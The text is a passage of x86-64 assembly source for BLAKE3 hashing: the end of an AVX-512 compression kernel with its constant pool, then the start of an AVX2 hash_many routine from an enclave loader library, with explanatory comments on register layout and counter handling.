vmovdqa xmm12,XMMWORD PTR [rsp]
vmovdqa xmm13,XMMWORD PTR [rsp+0x40]
vpunpckldq xmm14,xmm12,xmm13
vpunpckhdq xmm15,xmm12,xmm13
vpermq ymm14,ymm14,0xdc
vpermq ymm15,ymm15,0xdc
vpbroadcastd zmm12,edx
vinserti64x4 zmm13,zmm14,ymm15,0x1
mov eax,0x4444
kmovw k2,eax
vpblendmd zmm13{k2},zmm13,zmm12
vpbroadcastd zmm15,r8d
mov eax,0x8888
kmovw k4,eax
vpblendmd zmm3{k4},zmm13,zmm15
mov eax,0xaaaa
kmovw k3,eax
vbroadcasti32x4 zmm8,XMMWORD PTR [rsi]
vbroadcasti32x4 zmm9,XMMWORD PTR [rsi+0x10]
vshufps zmm4,zmm8,zmm9,0x88
vshufps zmm5,zmm8,zmm9,0xdd
vbroadcasti32x4 zmm8,XMMWORD PTR [rsi+0x20]
vbroadcasti32x4 zmm9,XMMWORD PTR [rsi+0x30]
vshufps zmm6,zmm8,zmm9,0x88
vshufps zmm7,zmm8,zmm9,0xdd
vpshufd zmm6,zmm6,0x93
vpshufd zmm7,zmm7,0x93
mov al,0x7
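// al counts down the 7 rounds of the BLAKE3 compression. In this 4-way zmm
// layout each 128-bit lane holds one complete state, so the diagonal step
// is performed by rotating rows in place with vpshufd (0x93/0x4e/0x39)
// rather than by addressing separate row registers.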
3:
vpaddd zmm0,zmm0,zmm4
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x10
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0xc
vpaddd zmm0,zmm0,zmm5
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x8
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0x7
vpshufd zmm0,zmm0,0x93
vpshufd zmm3,zmm3,0x4e
vpshufd zmm2,zmm2,0x39
vpaddd zmm0,zmm0,zmm6
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x10
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0xc
vpaddd zmm0,zmm0,zmm7
vpaddd zmm0,zmm0,zmm1
vpxord zmm3,zmm3,zmm0
vprord zmm3,zmm3,0x8
vpaddd zmm2,zmm2,zmm3
vpxord zmm1,zmm1,zmm2
vprord zmm1,zmm1,0x7
vpshufd zmm0,zmm0,0x39
vpshufd zmm3,zmm3,0x4e
vpshufd zmm2,zmm2,0x93
dec al
je 3f
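// Between rounds, apply BLAKE3's fixed message-word permutation
// (2,6,3,10,7,0,4,13,1,11,12,5,9,14,15,8) entirely in registers using
// shuffles and masked blends instead of reloading the block from memory.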
vshufps zmm8,zmm4,zmm5,0xd6
vpshufd zmm9,zmm4,0xf
vpshufd zmm4,zmm8,0x39
vshufps zmm8,zmm6,zmm7,0xfa
vpblendmd zmm9{k3},zmm9,zmm8
vpunpcklqdq zmm8,zmm7,zmm5
vpblendmd zmm8{k4},zmm8,zmm6
vpshufd zmm8,zmm8,0x78
vpunpckhdq zmm5,zmm5,zmm7
vpunpckldq zmm6,zmm6,zmm5
vpshufd zmm7,zmm6,0x1e
vmovdqa32 zmm5,zmm9
vmovdqa32 zmm6,zmm8
jmp 3b
3:
vpxord zmm0,zmm0,zmm2
vpxord zmm1,zmm1,zmm3
vbroadcasti32x4 zmm8,XMMWORD PTR [rdi]
vbroadcasti32x4 zmm9,XMMWORD PTR [rdi+0x10]
vpxord zmm2,zmm2,zmm8
vpxord zmm3,zmm3,zmm9
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
vextracti128 XMMWORD PTR [r9+0x40],ymm0,0x1
vextracti128 XMMWORD PTR [r9+0x50],ymm1,0x1
vextracti128 XMMWORD PTR [r9+0x60],ymm2,0x1
vextracti128 XMMWORD PTR [r9+0x70],ymm3,0x1
vextracti32x4 XMMWORD PTR [r9+0x80],zmm0,0x2
vextracti32x4 XMMWORD PTR [r9+0x90],zmm1,0x2
vextracti32x4 XMMWORD PTR [r9+0xa0],zmm2,0x2
vextracti32x4 XMMWORD PTR [r9+0xb0],zmm3,0x2
vextracti32x4 XMMWORD PTR [r9+0xc0],zmm0,0x3
vextracti32x4 XMMWORD PTR [r9+0xd0],zmm1,0x3
vextracti32x4 XMMWORD PTR [r9+0xe0],zmm2,0x3
vextracti32x4 XMMWORD PTR [r9+0xf0],zmm3,0x3
vmovdqa xmm0,XMMWORD PTR [rsp+0x10]
vmovdqa xmm1,XMMWORD PTR [rsp+0x50]
vmovdqa XMMWORD PTR [rsp],xmm0
vmovdqa XMMWORD PTR [rsp+0x40],xmm1
add r9,0x100
sub r10,0x4
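// Two-output path: each ymm packs one 128-bit state lane per remaining
// input. The counters for the pair are assembled from the saved low/high
// counter dwords at [rsp] and [rsp+0x40], with edx (apparently the block
// length) and r8d (apparently the flags word) blended into lanes 2 and 3
// of the final state row.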
2:
test r10,0x2
je 2f
vbroadcasti128 ymm0,XMMWORD PTR [rdi]
vbroadcasti128 ymm1,XMMWORD PTR [rdi+0x10]
vmovd xmm13,DWORD PTR [rsp]
vpinsrd xmm13,xmm13,DWORD PTR [rsp+0x40],0x1
vpinsrd xmm13,xmm13,edx,0x2
vmovd xmm14,DWORD PTR [rsp+0x4]
vpinsrd xmm14,xmm14,DWORD PTR [rsp+0x44],0x1
vpinsrd xmm14,xmm14,edx,0x2
vinserti128 ymm13,ymm13,xmm14,0x1
vbroadcasti128 ymm2,XMMWORD PTR [BLAKE3_IV+rip]
vpbroadcastd ymm8,r8d
vpblendd ymm3,ymm13,ymm8,0x88
vbroadcasti128 ymm8,XMMWORD PTR [rsi]
vbroadcasti128 ymm9,XMMWORD PTR [rsi+0x10]
vshufps ymm4,ymm8,ymm9,0x88
vshufps ymm5,ymm8,ymm9,0xdd
vbroadcasti128 ymm8,XMMWORD PTR [rsi+0x20]
vbroadcasti128 ymm9,XMMWORD PTR [rsi+0x30]
vshufps ymm6,ymm8,ymm9,0x88
vshufps ymm7,ymm8,ymm9,0xdd
vpshufd ymm6,ymm6,0x93
vpshufd ymm7,ymm7,0x93
mov al,0x7
3:
vpaddd ymm0,ymm0,ymm4
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x10
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0xc
vpaddd ymm0,ymm0,ymm5
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x8
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0x7
vpshufd ymm0,ymm0,0x93
vpshufd ymm3,ymm3,0x4e
vpshufd ymm2,ymm2,0x39
vpaddd ymm0,ymm0,ymm6
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x10
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0xc
vpaddd ymm0,ymm0,ymm7
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x8
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0x7
vpshufd ymm0,ymm0,0x39
vpshufd ymm3,ymm3,0x4e
vpshufd ymm2,ymm2,0x93
dec al
je 3f
vshufps ymm8,ymm4,ymm5,0xd6
vpshufd ymm9,ymm4,0xf
vpshufd ymm4,ymm8,0x39
vshufps ymm8,ymm6,ymm7,0xfa
vpblendd ymm9,ymm9,ymm8,0xaa
vpunpcklqdq ymm8,ymm7,ymm5
vpblendd ymm8,ymm8,ymm6,0x88
vpshufd ymm8,ymm8,0x78
vpunpckhdq ymm5,ymm5,ymm7
vpunpckldq ymm6,ymm6,ymm5
vpshufd ymm7,ymm6,0x1e
vmovdqa ymm5,ymm9
vmovdqa ymm6,ymm8
jmp 3b
3:
vpxor ymm0,ymm0,ymm2
vpxor ymm1,ymm1,ymm3
vbroadcasti128 ymm8,XMMWORD PTR [rdi]
vbroadcasti128 ymm9,XMMWORD PTR [rdi+0x10]
vpxor ymm2,ymm2,ymm8
vpxor ymm3,ymm3,ymm9
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
vextracti128 XMMWORD PTR [r9+0x40],ymm0,0x1
vextracti128 XMMWORD PTR [r9+0x50],ymm1,0x1
vextracti128 XMMWORD PTR [r9+0x60],ymm2,0x1
vextracti128 XMMWORD PTR [r9+0x70],ymm3,0x1
vmovdqu xmm0,XMMWORD PTR [rsp+0x8]
vmovdqu xmm1,XMMWORD PTR [rsp+0x48]
vmovdqa XMMWORD PTR [rsp],xmm0
vmovdqa XMMWORD PTR [rsp+0x40],xmm1
add r9,0x80
sub r10,0x2
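// Final single-output path: a plain xmm state, using the same 7-round loop
// and in-register message permutation as the wider paths.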
2:
test r10,0x1
je 9b
vmovdqu xmm0,XMMWORD PTR [rdi]
vmovdqu xmm1,XMMWORD PTR [rdi+0x10]
vmovd xmm14,DWORD PTR [rsp]
vpinsrd xmm14,xmm14,DWORD PTR [rsp+0x40],0x1
vpinsrd xmm14,xmm14,edx,0x2
vmovdqa xmm2,XMMWORD PTR [BLAKE3_IV+rip]
vpinsrd xmm3,xmm14,r8d,0x3
vmovups xmm8,XMMWORD PTR [rsi]
vmovups xmm9,XMMWORD PTR [rsi+0x10]
vshufps xmm4,xmm8,xmm9,0x88
vshufps xmm5,xmm8,xmm9,0xdd
vmovups xmm8,XMMWORD PTR [rsi+0x20]
vmovups xmm9,XMMWORD PTR [rsi+0x30]
vshufps xmm6,xmm8,xmm9,0x88
vshufps xmm7,xmm8,xmm9,0xdd
vpshufd xmm6,xmm6,0x93
vpshufd xmm7,xmm7,0x93
mov al,0x7
3:
vpaddd xmm0,xmm0,xmm4
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm5
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x93
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x39
vpaddd xmm0,xmm0,xmm6
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm7
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x39
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x93
dec al
je 3f
vshufps xmm8,xmm4,xmm5,0xd6
vpshufd xmm9,xmm4,0xf
vpshufd xmm4,xmm8,0x39
vshufps xmm8,xmm6,xmm7,0xfa
vpblendd xmm9,xmm9,xmm8,0xaa
vpunpcklqdq xmm8,xmm7,xmm5
vpblendd xmm8,xmm8,xmm6,0x88
vpshufd xmm8,xmm8,0x78
vpunpckhdq xmm5,xmm5,xmm7
vpunpckldq xmm6,xmm6,xmm5
vpshufd xmm7,xmm6,0x1e
vmovdqa xmm5,xmm9
vmovdqa xmm6,xmm8
jmp 3b
3:
vpxor xmm0,xmm0,xmm2
vpxor xmm1,xmm1,xmm3
vpxor xmm2,xmm2,XMMWORD PTR [rdi]
vpxor xmm3,xmm3,XMMWORD PTR [rdi+0x10]
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
jmp 9b
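// Constant pool. INDEX0/INDEX1 look like two-source dword-permute indices
// (values 16-31 select the second operand) for the widest path earlier in
// the file; ADD0/ADD1/ADD16 build and advance per-lane counters;
// BLAKE3_BLOCK_LEN is the 64-byte block size; BLAKE3_IV holds the first
// four IV words (shared with BLAKE2s and SHA-256), the only ones needed
// for row 2 of the state.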
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
INDEX0:
.long 0, 1, 2, 3, 16, 17, 18, 19
.long 8, 9, 10, 11, 24, 25, 26, 27
INDEX1:
.long 4, 5, 6, 7, 20, 21, 22, 23
.long 12, 13, 14, 15, 28, 29, 30, 31
ADD0:
.long 0, 1, 2, 3, 4, 5, 6, 7
.long 8, 9, 10, 11, 12, 13, 14, 15
ADD1: .long 1
ADD16: .long 16
BLAKE3_BLOCK_LEN:
.long 64
.p2align 6
BLAKE3_IV:
BLAKE3_IV_0:
.long 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A
|
mit-enclaves/argos-monitor | 66,050 | C/libraries/sdktyche/loader/blake3_avx2_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global _blake3_hash_many_avx2
.global blake3_hash_many_avx2
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_avx2:
blake3_hash_many_avx2:
_CET_ENDBR
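// System V AMD64 entry. The register arguments match the upstream
// blake3_hash_many prototype: rdi = array of input pointers, rsi = number
// of inputs, rdx = blocks per input, rcx = 8-word key, r8 = 64-bit counter,
// r9d = increment_counter flag. The byte arguments flags, flags_start and
// flags_end and the output pointer arrive on the stack; after the six
// pushes below they are read at rbp+0x38/0x40/0x48/0x50.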
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 680
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9d
vmovd xmm0, r9d
vpbroadcastd ymm0, xmm0
vmovdqa ymmword ptr [rsp+0x280], ymm0
vpand ymm1, ymm0, ymmword ptr [ADD0+rip]
vpand ymm2, ymm0, ymmword ptr [ADD1+rip]
vmovdqa ymmword ptr [rsp+0x220], ymm2
vmovd xmm2, r8d
vpbroadcastd ymm2, xmm2
vpaddd ymm2, ymm2, ymm1
vmovdqa ymmword ptr [rsp+0x240], ymm2
vpxor ymm1, ymm1, ymmword ptr [CMP_MSB_MASK+rip]
vpxor ymm2, ymm2, ymmword ptr [CMP_MSB_MASK+rip]
vpcmpgtd ymm2, ymm1, ymm2
shr r8, 32
vmovd xmm3, r8d
vpbroadcastd ymm3, xmm3
vpsubd ymm3, ymm3, ymm2
vmovdqa ymmword ptr [rsp+0x260], ymm3
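// Counter setup. neg r9d turns the increment_counter flag into an all-ones
// or all-zero mask that gates the per-lane offsets from ADD0/ADD1 (defined
// outside this excerpt). AVX2 lacks an unsigned dword compare, so the low
// counter words are biased by XOR with CMP_MSB_MASK (presumably 0x80000000
// per lane) and signed vpcmpgtd detects wraparound; vpsubd then propagates
// the carries into the high counter words kept at [rsp+0x260].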
shl rdx, 6
mov qword ptr [rsp+0x2A0], rdx
cmp rsi, 8
jc 3f
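// Main loop: each pass of 2: hashes a group of eight inputs. The key words
// are broadcast so that ymm0-ymm7 hold the eight chaining values
// word-sliced (row i = word i of all eight CVs), while r8-r15 hold the
// eight input pointers.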
2:
vpbroadcastd ymm0, dword ptr [rcx]
vpbroadcastd ymm1, dword ptr [rcx+0x4]
vpbroadcastd ymm2, dword ptr [rcx+0x8]
vpbroadcastd ymm3, dword ptr [rcx+0xC]
vpbroadcastd ymm4, dword ptr [rcx+0x10]
vpbroadcastd ymm5, dword ptr [rcx+0x14]
vpbroadcastd ymm6, dword ptr [rcx+0x18]
vpbroadcastd ymm7, dword ptr [rcx+0x1C]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x20]
mov r13, qword ptr [rdi+0x28]
mov r14, qword ptr [rdi+0x30]
mov r15, qword ptr [rdi+0x38]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
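// Per-block loop (9:). rdx is the byte offset into every input; on the
// final block the cmp/cmove pair below merges the flags_end byte into the
// flags word for that block only.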
.p2align 5
9:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x2A0]
cmove eax, ebx
mov dword ptr [rsp+0x200], eax
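// Load one 64-byte block from each of the eight inputs and transpose the
// 16 message words into row vectors spilled at [rsp]..[rsp+0x1E0]; each of
// the four vinsertf128/vunpck/vshufps groups below transposes a 16-byte
// column slice of the block across all inputs.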
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x40], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x40]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x40], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x40], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x40]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x40], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x20], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x40], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x60], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x30]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x30], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x30], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x30]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x30], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x30], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x80], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0xA0], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0xC0], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0xE0], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x20], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x20]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x20], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x20], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x20]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x20], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x100], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x120], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x140], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x160], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x10]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x10], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x10], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x10]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x10], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x10], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x180], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x1A0], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x1C0], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x1E0], ymm11
vpbroadcastd ymm15, dword ptr [rsp+0x200]
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
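// Seven unrolled rounds follow. Rotations by 16 and 8 are byte-aligned, so
// they use vpshufb with the ROT16/ROT8 masks; rotations by 12 and 7 need
// vpsrld/vpslld/vpor pairs. With only 16 ymm registers, state row v8 is
// spilled to [rsp+0x200] whenever ymm8 is needed as scratch.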
vpaddd ymm0, ymm0, ymmword ptr [rsp]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x80]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm0, ymmword ptr [rsp+0x240]
vpxor ymm13, ymm1, ymmword ptr [rsp+0x260]
vpxor ymm14, ymm2, ymmword ptr [BLAKE3_BLOCK_LEN+rip]
vpxor ymm15, ymm3, ymm15
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [BLAKE3_IV_0+rip]
vpaddd ymm9, ymm13, ymmword ptr [BLAKE3_IV_1+rip]
vpaddd ymm10, ymm14, ymmword ptr [BLAKE3_IV_2+rip]
vpaddd ymm11, ymm15, ymmword ptr [BLAKE3_IV_3+rip]
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x20]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xA0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x100]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x180]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x120]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1A0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x40]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xE0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
